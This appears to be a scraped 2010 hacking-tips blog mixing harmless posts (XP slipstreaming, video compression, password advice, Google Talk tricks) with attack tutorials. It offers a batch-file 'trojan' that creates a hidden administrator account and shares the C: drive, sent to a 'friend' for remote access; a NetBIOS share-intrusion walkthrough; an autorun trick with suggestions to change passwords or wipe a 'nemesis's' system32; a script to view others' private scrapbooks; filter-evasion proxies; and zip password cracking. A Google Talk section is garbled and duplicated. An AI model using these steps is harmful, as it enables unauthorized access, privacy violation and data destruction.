We'll use a software called nLite to create a new XP install cd, so you'll first need to download and install it. Once it starts up, you'll be prompted for your Windows installation, so you'll want to click the Browse button.

First you'll be prompted for the "Windows installation", which really means your XP install CD. Find it and select the root of the installation, and then click OK to go to the next dialog.

Next you'll be prompted on where you want to save the temporary files used during the slip-streaming process. I chose to create a new directory and called it XPISO, but you can put it wherever you'd like. I just recommend to use a new directory.

Lite will copy all the necessary files off the XP installation and into the temporary folder. When it's done, you'll see all the information on which version it is.

Hit the next button until you come to this screen, where you can select what options you want. Select "Drivers" and then "Bootable ISO".

Hit the next button until you get to the screen for selecting drivers. If you click the Insert button, you can choose between adding a single driver or adding a folder of drivers. Since we'll just be loading a single driver, you can choose that option, but you might want to first read the section below about finding drivers for XP.

Browse to the directory where you extracted the driver files, and then select Open. Note that it doesn't really matter which of the *.inf files you choose, because it will select all files in the folder anyway

nLite will prompt you to select your driver. If you don't know which exact one it is, you can either use Device Manager in Vista to find the exact model, or you can just select all of them. Just be careful not to select a 64-bit driver if you are using 32-bit, or the wrong OS version.

I would recommend including both Storage and Network drivers, as those are the most common drivers that are missing in XP.

Once you proceed to the next screen, now we can finally finish the process. You can choose to directly burn the cd here, or you can select Create Image to create an ISO file that you can burn to a CD using whatever burning tool you have.

Note: If you chose to create an ISO, make sure to use the "Make ISO" button before you click Next.

At this point you can burn the ISO image to a CD, and then start your XP installation process.

Finding Drivers for XP

The best place to search for drivers for your hardware is at the manufacturer's support website. The only problem is that almost every manufacturer seems to distribute their drivers in floppy disk image form, even though the computer they are for doesn't have a floppy drive. Guess nobody has alerted them to get with the program.

We can still extract the drivers using an application called WinImage. Let's run through a quick example… Here you can see the Intel SATA controller driver for my HP computer.

I downloaded and ran the executable, which extracted a file called f6flpy32.exe into a temporary directory. Don't bother trying to run this one, because it'll just prompt you for a floppy drive.

So how to get the drivers out of this file? There are a few options that you can try, depending on how the manufacturer packed the files.

* You can use Winimage to extract them, which is a shareware software, but you can use it during the trial period for free.
* You can try and use WinRar to extract the file. In many instances this will extract a *.flp file, which you can mount in a VMware virtual machine or potentially with some ISO mounting software.
* Some drivers will allow you to automatically extract into a directory. You'll have to try it and see what happens.
* Other methods? If you've got other ideas, leave them in the comments and I'll add them to this list.

Here's the list of files that Winimage can handle, which is quite a lot.

Start WinImage and then open the file, and you should see the contents. Just extract them to a folder, preferably with a useful name so you can remember it later.

Happy Installation ... Careful..

Track USB drive users

2010-04-30T06:56:00.000-07:00

I got an interesting email from my blog reader Reynold who asked me that how he can track users who used his USB Track USB drive usersdrive after he has given it to someone. He wanted to get the usernames of the accounts where the pendrive was used. I thought for a while and told him that he can achieve this feat either by using Trojans or a combination of Batch and Autorun files. However,you must advise users to not to format the pendrive in order for this to work.The second option of Batch files was easy and less suspicious.So Here is how I made it possible to get the usernames when the pendrive was plugged into the PC -

Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

Create username.bat and

autorun.inf in the root of your pendrive

NOTE : The Last Line of the code is optional which will open the explorer in a new window.

Save both file and you are good to go. Now whenever a user plugs your pendrive into their PC,it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear.Now If you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or disable writing to USB drives) ,or they just bypass it by pressing RISHT SHIFT key when the pendrive is connected and hence their name will not be recorded or they can delete the users.dat file. But that said,it will work fine nevertheless :)

NOTE 2 : Umm..I think the above code is way too easy and harmless,why not to get creative and create a batch file which will even change the password ?(DOS NET commands) or even wipe out system32 of your nemesis (cacls command) ?

Recover Email Password using SMS

2010-04-30T06:53:00.000-07:00

First of all..I would like to say that Gmail is out of Beta..yep..After a long time when they have integrated the best of world in their email system,Recover Password Using SMS - rdhacker.blogspot.comit was the right time to rip off the tag,and they did it.Further,with the world going mobile,they took some of the steps to better enhance the security even a notch above than other email services. It helps to know that even the best of us forget our passwords from time to time and In fact,the sheer amount of people visit Gmail help center everyday just to recover their passwords. To help with these situations, Google went a step ahead by adding the ability to recover your password via text message.

In order to access this feature,sign in to your account and select ' Change Password Recovery Options ' enter your cell phone number and click ' Save '
The Next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.
In general, it's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and security question. And don't forget to keep them up-to-date.
Afterall,we all make mistakes :P

Compress Videos to smallest size

2010-04-30T06:51:00.000-07:00

Okay..A video is nothing but a series of still images moving in fast motion such that they appear to be moving.I mean a sequence of still images representing scenes in motion.Frame rate, the number of still pictures per unit of time of video,ranges from PAL (Europe, Asia, Australia, etc.) and SECAM (France, Russia, parts of Africa etc.) standards specify 25 frame/s, while NTSC (USA, Canada, Japan, etc.) specifies 29.97 frame/s.The minimum frame rate to achieve the illusion of a moving image is about 15 frames per second or the video will be too jerky and you will be a dead jerk.
TERMINOLOGY

* BITRATE/Datarate- The parameter of quality of Video,Higher Bitrate,greater size and gr8 quality.Reverse is ALSO true !
* FPS - Nopes..its not FIRST PERSON SHOOTER (Sorry gamers :P) Its Frames per second.Simply changing from 30 fps to 24 fps could result in as much as 20 percent file size reduction!It's better to choose a slightly lower, 'round-number' frame-rate in most cases, such as 24.0, or 25.0.
* CBR - Constant Bitrate.Variable Bitrate in compression leads to high quality audio/video with less file size.
* VBR - Variable Bitrate.Variable Bitrate in audio compression leads to less high quality audio as compared to VBR.Its Used for streaming purposes.
* MP1/2/4 or MPEG1/MPEG2/MPEG4 - A video format developed by Motion Pictures Experts Group and Hence the name.MPEG 1 was the first in series allowing for video playback.MPEG2 allows DVD quality and MPEG4 aims at steaming internet media and High compression technique.
* AVI - Audio Video Interleaved.One of the oldest formats available,It enjoys itself in new incarnations as DIVX and XVID.Its a shell in which other techniques/compression/encoding methods -are worked out.
* High Definition- Very high bitrate media used for home/personal viewing.

FORMATS

Due to popularization of video,

flurry of video formats have flodded the market.But still the most popular ones remain WMV,AVI,MPEG1/2/4,DIVX,XVID,H.264,FLV,RMV,QUICKTIME and More...
Audio formats include MPEG3,Ogg,AC3,WMA,WAV,RM and many more..
Then comes the DVD and High Defination Media,Encoded at much high bitrate

TOOLS

The List is long..and You might not want everyone of them :) To get them,just Google the name.They are widely recognized .
WARNING
=======
[VIDEO ENCODERS/DECODERS ARE SYSTEM/MEMORY HOGS !!! SINCE ITS A VERY INTENSIVE AND TIME CONSUMING PROCESS,YOU MIGHT WANT TO FINISH IT ASAP]

* NERO - Available like booze and (almost) free. Make it enterprise (if u have not one already) and use NERO VISION to squeeze it out.Also supports editing.
* Avid - Professionals Use it...nice interface..but still costly.supports editing.
* IMTOO MPEG ENCODER - Terrific performance,supports exhaustive list of formats.Noobs and Newbie's,do yourself a favor and just stick to it.It will deliver almost everything you want (except editing).
* FFDSHOW - A collection of collective codecs.Use command line (if you like) to encode videos,or just watch/decode videos using it. It comes free with K-Lite mega codec pack :)
* VIRTUAl Dub - Free,fantastic and supports everything.But you might need to brainstorm for using it.supports editing and a lot of stuff !! Highly recommended for Geeks .
* AC3DEC - Used to decode AC3 audio files.Most of DVD's use this audio compression method.Get its GUI program to get the best out of it.
* FLASKMPEG - used to rip dvd's..well you have plenty of choices out there...

COMPRESSION

"SPEED VS QUALITY"

Compress using any format you want,full frames of even a 10 minute footage will eat up a lot of disk space in your PC.So..some of optimisation measures you can take to compress videos -

* Choose a good codec like DIVX/XVID,MPEG4 or WMV.
* When Aiming for MAXIMUM compression with MINIMUM quality loss,So just choosing the compressor is NOT ENOUGH..tweak accordingly bitrates (lower for low quality small file size and higher for more quality LARGE file size)
* If a larger video is shrunk to 320x240 or similar size, the quality will be MUCH HIGHER than by simply capturing the same video at 320x240.Shrinking the frame size from say 640x480 to say 320x240,will often result in about the same picture quality as the original 640x480 video,but the new 320x240 file will probably be much much smaller.
* Crop the video to get small frame size.
* Use low bitrate audio to get small size video.
* USE NO AUDIO for silent tutorials.
* Frame rate can drastically affect filesize.

My Setting for Internet publishing/Mobile phones (low end net connection) -

* CODEC - MPEG4
* VIDEO BITRATE - 128/160 KBPS
* AUDIO BITRATE (if any) - 32/48/64 KBPS
* FRAME RATE - 15/24/25/30 FPS (choose your pick :P )
* VIDEO SIZE - 320 X 240 for internet,176 X 144 for mobile phones

I use SNAG-IT 8 for as my screen capture program

DVD-RIP

FOR COMPRESSING 4 GB VIDEO MOVIE [Assuming you have .VOB files ready]

Section A for NOOBS

TOOL USED- IMTOO MPEG ENCODER

1. open IMTOO.
2. Select Movie File.
3. Select video size from menu.For DVD quality,choose 720 X 480.
4. Set Birate to 700-900 KBPS.
5. Set Framerate to 25 FPS.
6. Set aspect as you wish.
7. Set Audio Codec to MP3,Audio bitrate to 160 KBPS/192 KBPS
8. Set Audio sample rate to 44100 Hz
9. Hit Encode and leave the PC alone for encoding of file.

Section B for GEEKS OUT THERE :D

TOOL USED - VIRTUAL DUB,AC3DEC,FLASKMPEG
*PLACE ALL .VOB FILES AT SAME FOLDER !
[1]. open FlaskMPEG to convert the VOB video files,select video file,Choose the type of codec (compressor/decompressor) you want to use generally that will be DivX.DIVX LOW MOTION is best for almost all movies and for those which have NO ACTION and Fast-Motion is only good when almost the entire movie is very fast paced like Terminator 2 or that of Final Fantasy - Advent Children..you get the idea.. and set bitrate to 900 KBPS,frame rate to 24/25 KBPS,choose output location,set process priority to high and hit encode and STAY AWAY FROM YOUR PC !!! After a looooooong time,you will have a single AVI file.
[2]. Put AC3DEC.exe in UR VOB FILE folder,run command prompt, and type-
ac3dec [FILENAME1.VOB] -allvobs -out [filename2.WAV]
NOTE -
* ac3dec is the name of the application being run -- you can also write "ac3dec.exe", with the identical effect
* FILENAME1 is the name of the first .vob file -- in this case 'vts_01_1'
* FILENAME2 is the name of the .wav file you are going to create -- you chose 'MI3Sound'
* -allvobs means to include all .vob files in the folder sequentially (as a single logical file)
* -out means you want to specify the name and path of the output file
Using the example above you will type this in prompt:

C:\MI3> ac3dec vts_01_1.vob -allvobs -out c:\windows\desktop\MI3.wav

Press Enter and the saving process will begin. After it finishes,close command prompt.You will have a file named MI3.wav on your desktop (approx 1GB).

[PS: GUI VERSION OWNERS WILL HAVE LESS HASSLES..BUT AFTER ALL THIS SECTION IS FOR GEEKS :P]
[3]. open Virtual Dub and select Movie File.Choose "Direct Stream Copy" from VIDEO menu.
[4]. Open the audio WAV file which was created by going to the AUDIO menu, and choosing "Use WAV file". Select the .wav file. Choose "Full Processing Mode" under Audio menu.
[5]. Then Choose "Compressor", choose the MP3 codec,Set Audio quality to 160 KBPS for high quality and 192 KBPS for Very High quality audio.
[6]. Then set 24.000 or 25.000 FPS from Frame rate option in video menu.
[7]. Choose "FILTERS" in the VIDEO menu and Add filters you want one at a time (if you wish).Configure it and use it accordingly.
[8]. Hit encode and in 25 to 50 minutes you will have your rip ready :)

NOTE : You can test how good the compression is so far, by compressing the resulting video file into a RAR file.Two Cases arise then -

1. If there is less than 5% compression,the compression is probably about as good as it will get.
2. If there is more than 5% compression,the audio and/or video can probably be compressed even further.h.264 or xvid/DIVX are your best bets for smallest file size at any given quality. Just keep in mind that eah has various quality settings that effect the compression, and thus the output size. You could use the same program to convert to each, but if the default settings are different,your output file size testing would be skewed.

FINDING SOFTWARE

DVD-Ripping software of all kinds can be gotten at www.divx-digest.com
www.download.com for all different kinds of programs.

How not to get Hacked – Choosing the Right Password

2010-04-30T06:48:00.000-07:00

Its a digital nightmare when your password gets hacked. Password compromise = your are fucked, straight away. How not to get Hacked – Choosing the Right Password - theprohack.comAnd if you do happen to be at an important position in a firm, and unfortunately find yourself the root cause of company’s security problems, its time to learn a few basics of choosing the right password. Be it your Email ID, terminal login, voicemail or anything that uses a generic password protection system,you need to choose a secure password for your digital ventures. Nevertheless, this simple guide is applicable to every netizen online who wants to secure himself by choosing the right password. Cause in the end, its your password that makes it easy, or hard for attackers to gain access to your account.

About Bad Passwords

Poor weak passwords have the following characteristics (if you have even one,make sure to change it) -

* Password size less than 15 characters
* Password is a word from dictionary

The password is -

* Name of family,pet,your favorite videogame character.
* Computer terms,commands,website name,hardware,software etc.
* Personal data like birthday,mobile phone numbers, address etc.
* Any of the above spelled backwards! or succeeded or preceded by a number or letter (password1, 1 password)
* In short any form of personal stupidity leads to tragic events :P

How to get hacked ?

* Reveal your password to any one.
* Reveal it in an email message,phone call,to your boss, give hints to others,share it with friends and co workers.
* Write it down somewhere.
* Keep same passwords for all your digital ventures, like emails, voicemails etc
* NEVER CHANGE IT.

Passwords shall be hard to guess - theprohack.com

In any case, if you want the opposite, follow the opposite :)

Making a STRONG Password

use phrases to form passwords, these are much secure to form and hard to guess.

for eg, the phrase -

“ This is a super secure password and is hard to hack :P ”

will form a password given below by taking the first letter and substituting similar sounding words with numbers. See..its quite hard to hack :)

“ Tiassp&ih2h:P ”

Use numbers, letters, uppercase and lowercase and mix them freely to form you password. make sure its not a dictionary word and DOES NOT CONTAIN any characteristic of weak passwords stated earlier.

A more secure version is to use passphrases to form passwords. A passphrase is a longer version of password and hence its more secure. Make sure its easy to remember,not a famous quotation and hard to guess by intuition

As Clifford Stoll says,

“ Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months “

He is damn right..just make sure you change it every month or more often to be secure.

I guess you will now be able to form secure passwords and deploy them fully.

View Locked Scrapbooks

2010-04-24T20:51:00.001-07:00

This is a very useful trick when somebody has locked his/her scrapbook to be viewed by others.

How To Use this Hack?

There are three ways to use this hack.You can choose the one that best suits you.

a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook.

or

b> Using this Javascript :

* Navigate to the profile which has disallowed non-friends to view his/her scrapbook

* Run this script in the address bar

*javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+encodeURIComponent(location.href);void(0)

* Wait for 4-5 seconds and you will get to see the scraps.

or

c> Userscript (Credits – D3 ) -

The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below:

* Install Grease Monkey in case you don’t have it – Click Here

* Install View Locked Scrapbook Script

* In case you have any problems downloading or operating these scripts, you must read this tutorial.

Making your own trojan in a .bat file

2010-04-24T20:50:00.001-07:00

Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here

they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

NetBIOS Attack

2010-04-24T20:48:00.000-07:00

So NetBIOS is the first thing when you want to root to learn. In my article i will considerate that my target don”t have password protected the files, shared files.

Tools:
Windows target and attacker(i don”t know if this attack work on Linux or other os)

First we need to choose a target we will consider our target to be a friend from the same LAN who own BOX666

Step 1:
open cmd
start->run->cmd->enter

Step 2:
Now we need to gather info about our target BOX666 to do this we will do a net view command

c:>net view

We do this to see all computers from our LAN

Without scanning the host for open ports we can see if our target is vulnerable to NetBIOS attack and have Printer
and Files Sharing activate. We use the nbtstat command. but we need the ip address not the box name so we will ping our target

c:>ping BOX666

After the pinging process end we have our target ip let’s say 1.1.1.1

Now we can use nbtstat command

c:>nbtstat -A 1.1.1.1

Now we get a list of some starnge data all what we are looking for is this:

<20>

This is a hex number who tell us that the BOX666 is vulnerable. Now we need to connect to target but if we connect what we can take. To gather information about shared files on BOX666 we use net view command

c:>net view 1.1.1.1

Now we have a list of shared files. Sometimes stupid users share a full partition or all partitions even the one where Windows is installed >:)

Step 3:
Now let’’s connect using net use command

c:\>net use x: \\1.1.1.1shared_item

With this command we have created an network driver. To download data, upload data you can use cmd or windows explorer(recommended)

Step 4:
After you have done your job close the connection by using net use command

c:>net use x: /d

Now the network driver is gone

Congrats now you know how to do a NetBIOS Attack.

How to Set up your own Proxy Server

2010-04-24T20:47:00.001-07:00

Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.

Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net

1. phpproxy

Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.

You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess

The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]
2. cgiproxy

Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.

First, download the source and unpack it to a local directory.

Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.

After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)

3. What is being blocked ?

a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.

Increase Dial up Download speed

2010-04-24T20:46:00.001-07:00

Dial up Download speed is low and some time it can be unused for advanced user so to improve Dial up Download speed following registry editing is helpfull.

1. Direct in Regedit
:
Open
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ Tcpip\Parameters

Edit as follows:
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c

OR

2. By .Reg file :
Open notepad & paste

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
“SackOpts”=dword:00000001
“TcpWindowSize”=dword:0005ae4c
“Tcp1323Opts”=dword:00000003
“DefaultTTL”=dword:00000040
“EnablePMTUBHDetect”=dword:00000000
“EnablePMTUDiscovery”=dword:00000001
“GlobalMaxTcpWindowSize”=dword:0005ae4c

>> Now save this file as speed.reg (in Windows). Execute it and observe the change!

Google Talk Cheats

2010-04-24T20:44:00.000-07:00

With Google
Talk being all the craze right now, some people hacking it, and others loving it, I figured that I would post a list of tips and tricks for those curious about the extra “features” Google implemented and has not said much about.

Registry Tweaks
You can edit most settings by opening regedit (start -> regedit),
and navigating to the key HKEY_CURRENT_USER\Software\Google\Google Talk.
The “Google/Google Talk” key has several sub-keys that hold different option values:
Accounts: This one has subkeys for each different account that has logged in on the client. These keys have different values that store the username, password and connection options.
Autoupdate: Stores the current version information. When the client checks for updates it compares Google’s response with these values. If an update is needed, it will download and update the new version.
Options: This is the most interesting part, where most of the current hacks should be used (keep reading).

Process: Stores the process ID. Probably used by Google Talk to detect if it’s already running or not.
1.) HKEY_CURRENT_USER\Software\Google\Google Talk\Options\show_pin
If 1, shows a “pin” next to the minimize button that keeps the windows on top of all the other open windows when clicked.
2.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\view_show_taskbutton
If 0, hides the taskbar button, and leaves the tray icon only, when the window is shown
3.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\away_inactive
If 1, status will be set as Away after the specified number of minutes.
4.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\away_screensaver
If 1, status will be set as Away after the specified number of minutes.
5.)HKEY_CURRENT_USER\Software\Google\Google Talk\Options\inactive_minutes
Number of inactive minutes to become away if auto-away is on.

More Tips & Tricks
Change the font size – While holding the control key, move the scroll wheel on your mouse either up or down. This trick works while being focused in either the read or write area.Insert line breaks – If you want to have a message that spans multiple paragraphs, just hold shift and hit enter. You can add as many new lines as you want to create.

Bold Text – To write something bold, you can use an asterisk before and after the word, like *this* .
Italic Text – To use italics, use an underscore before an after the word, like _this_ .

Switch windows – Hitting tab will cycle through open windows. It will select minimized conversations, to expand them just hit enter. If you just want to cycle through IM’s and don’t care about the buddy list, control-tab will do that and will automatically expand a minimized conversation if you settle on one.

Invitation Tips – You don’t need to say Yes or No when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this in the options).

Show Hyperlinks – You can show your homepage or blog URL simply by entering the it in your away message (at the top of the main window). It will automatically turn to a link visible to others.

A message can be 32767 characters long.

How To Conference Calls :

What you need to do to have conference calls: Open up a copy of Google Talk on all computers with which you wish to conference. After one copy is opened make a new shortcut for Google Talk but at the end of it add /nomutex. If you installed it to the default folder then your shortcut should read “C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex. Open 2nd instances of the software on every user’s computer. After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.
Nickname & Status Message :

You can’t change your nickname in a way that other people will see it change. Every nickname in the Google Talk contactlist is the part that is before @gmail.com (only the alphabetical characters are used) or the name you chosen for your GMail account. To change the nickname need to go to your Gmail account and change the name there. Choose Settings, Accounts, and then Edit info. Click on the second radio button, and enter your custom name. As a result all of your emails will have that nick as well, there is no way to seperate the two. You can add a website in your custom message, it will be clickable when someone opens a conversation window with you.
Contacts :

You don’t need to say Yes or No when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this).
The Gmail account ‘user@gmail.com’ can’t be invited as your friend.
[eminimall]
Play Music :

It’s possible to broadcast music, MP3, etc.. through Google Talk.
Unplug your microphone. Double click on the speaker icon in the lower right corner. This will open up “Volume Control”. Select “Options” and then “Properties”. Then check the button next to “Recording” then click OK. You may also have to change your setting under Mixer Device. Now the Recording Control screen should be up. On my computer I selected “Wave Out Mix”. Click on the green phone in Google Talk and call your friend.

Keyboard Shortcuts

Ctrl + E – It centralizes the selected text, or the current line.
Ctrl + R – It justifies to the right the selected text, or the current line.
Ctrl + L – It justifies to the left the selected text, or the current line.
Ctrl + I – The same thing does that Tab.
Tab – It is giving the area to each of the windows opened by Google Talk.
Ctrl + Tab – The same thing does that Shift + Tab .
Shift + Tab – The same thing does that Tab but in reverse.
Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbers
Ctrl + 1 (KeyPad) – It does a simple space between the lines.
Ctrl + 2 (KeyPad) – It does a double space between the lines.
Ctrl + 5 (KeyPad) – A space does 1.5 between the lines.
Ctrl + 1 (NumPad) – It goes at the end of the last line.
Ctrl + 7 (NumPad) – It goes at the begin of the last line.
Ctrl + F4 – It closes the current window.
Alt + F4 – It closes the current window.
Alt + Esc – It Minimize all the windows.
Windows + ESC – Open Google Talk (if it’s minimized, or in the tray)
F9 – Open Gmail to send an email to the current contact.
F11 – It initiates a telephonic call with your friend.
F12 – It cancels a telephonic call.
Esc – It closes the current window.

[HOWTO] Use multiple identities on Google Talk

Want to run Google Talk with multiple Gmail identities? If you have several Google Gmail accounts you also may want to run multiple instances of Google Talk This is especially important for families that share a single PC. Nothing worse than a family member signing you out so they can sign in under their own account!
Basically, to have “Google Polygamy” you need to run Google Talk with the following switch: /nomutex
Step 1: Right-click on the desktop
Step 2: Select New
Step 3: Select Shortcut
Step 4: Paste this into the text box:
“c:\program files\google\google talk\googletalk.exe” /nomutex
Step 5: Click Next and choose a shortcut name such as Google Talk1, Google Talk2, or something related to your Gmail account for easy remembering which account is which.
Step 6: Click OK a few times.

[HOWTO] Use Google Talk via a Web Browser

You want to use Google Talk anywhere ? Follow these guidelines :)
Step 1: Opens your favorite web browser at the following address :
http://www.webjabber.net:8080/jim/
Step 2: Follow the instructions of the Page.
Step 3: You can talk with your friends
Google’s Secret Command-Line Parameters
There are a few secret parameters you can add to Google Talk and make it function differently.
The most important, I think, is /nomutex, which allows you to run more than one instance of GT. Here are the others:
/nomutex: allows you to open more than one instance of Google Talk
/autostart: when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the “Start automatically with Windows” option is unchecked, it won’t start.
/forcestart: same as /autostart, but forces it to start no matter what option was set.
/S upgrade: Used when upgrading Google Talk
/register: registers Google Talk in the registry, includig the GMail Compose method.
/checkupdate: check for newer versions
/plaintextauth: uses plain authentication mechanism instead then Google’s GAIA mechanism. Used for testing the plain method on Google’s servers.
/nogaiaauth: disables GAIA authentication method. The same as above.
/factoryreset: set settings back to default.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode
/log: probably has something to do with the diagnostic logging
/unregister: ?
/embedding: ?
To add these, open up your GT shortcut, and where it says “Target:” add one or more of these inside the quotations, but after the .exe part.

Command Line stuff

There are a few secret parameters you can add to Google Talk and make it function differently. The most important, I think, is /nomutex, which allows you to run more than one instance of GT. He Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the “Start automatically with Windows” option is unchecked, it won’t start.
/forcestart: same as /autostart, but forces it to start no matter what option was set.
/S upgrade: Used when upgrading Google Talk
/register: registers Google Talk in the registry, includig the GMail Compose method.
/checkupdate: check for newer versions
/plaintextauth: uses plain authentication mechanism instead then Google’s GAIA mechanism. Used for testing the plain method on Google’s servers.
/nogaiaauth: disables GAIA authentication method. The same as above.
/factoryreset: set settings back to default.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode
/log: probably has something to do with the diagnostic logging
/unregister: ?
/embedding: ? To add these, open up your GT shortcut, and where it says “Target:” add one or more of these inside the quotations, but after the .exe part. ere are the others:
/nomutex: allows you to open more than one instance of Google Talk
/autostart: when Google

Cracking Password Protected Zip Files

2010-04-24T20:40:00.000-07:00

What is FZC?

FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you’re gonna need a password to open the zip file and extract files out of it). You can get it anywhere – just use a search engine such as google.com.

FZC uses multiple methods of cracking – bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a “wordlist”, which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).

FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you’re not supposed to have. So like every tool, this one can be used for good and for evil.

The first thing I want to say is that reading this tutorial… is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase “check name.txt” often in this text. These files should be in FZC’s directory. They contain more information about FZC.

FZC is a good password recovery tool, because it’s very fast and also support resuming so you don’t have to keep the computer
turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything – a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn’t really matter, because in order to bruteforce a password with 32 chars you’ll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.

FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don’t require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.

